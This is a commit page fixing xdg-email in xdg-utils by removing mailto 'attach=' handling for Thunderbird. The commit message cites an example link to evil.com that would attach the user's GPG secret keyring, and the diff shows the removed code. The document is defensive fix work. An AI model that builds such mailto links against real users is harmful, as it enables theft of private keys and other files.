xdg-email: remove attachment handling from mailto

This allows attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg

See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
and xdg/xdg-utils#177Signed-off-by: Jörg Thalheim's avatarJörg Thalheim <joerg@thalheim.io>
parent 9816ebb3
......@@ -32,7 +32,7 @@ _USAGE
run_thunderbird()
{
local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
THUNDERBIRD="$1"
MAILTO=$(echo "$2" | sed 's/^mailto://')
echo "$MAILTO" | grep -qs "^?"
......@@ -48,7 +48,6 @@ run_thunderbird()
BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
if [ -z "$TO" ] ; then
NEWMAILTO=
......@@ -68,10 +67,6 @@ run_thunderbird()
NEWMAILTO="${NEWMAILTO},$BODY"
fi
if [ -n "$ATTACH" ] ; then
NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
fi
NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
"$THUNDERBIRD" -compose "$NEWMAILTO"
......
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment